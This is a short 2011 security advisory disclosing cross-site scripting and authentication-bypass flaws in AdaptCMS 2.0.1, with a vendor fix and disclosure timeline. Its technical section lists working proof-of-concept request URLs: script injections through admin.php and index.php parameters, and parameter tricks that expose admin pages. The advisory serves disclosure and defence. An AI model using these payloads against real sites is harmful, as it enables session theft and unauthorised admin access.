Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities Advisory ID: SSCHADV2011-018 Author: Stefan Schurtz Affected Software: Successfully tested on AdaptCMS 2.0.1 Vendor URL: http://www.adaptcms.com/ Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description: ========================== AdaptCMS 2.0.1 is prone to multiple security vulnerabilities ================== Technical Details: ================== Cross-site Scripting http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script> Authentication bypass / Information Disclosure http://<target>/AdaptCMS/admin.php?view=/&view=settings http://<target>/AdaptCMS/admin.php?view=/&view=users http://<target>/AdaptCMS/admin.php?view=/&view=groups http://<target>/AdaptCMS/admin.php?view=/&view=levels http://<target>/AdaptCMS/admin.php?view=/&view=stats ========= Solution: ========= "Get the latest AdaptCMS Files" from the admin area ==================== Disclosure Timeline: ==================== 24-Sep-2011 - informed developers 24-Sep-2011 - Release date of this security advisory 25-Sep-2011 - fixed by vendor 25-Sep-2011 - post on BugTraq ======== Credits: ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References: =========== http://www.adaptcms.com/ http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole http://www.rul3z.de/advisories/SSCHADV2011-018.txt
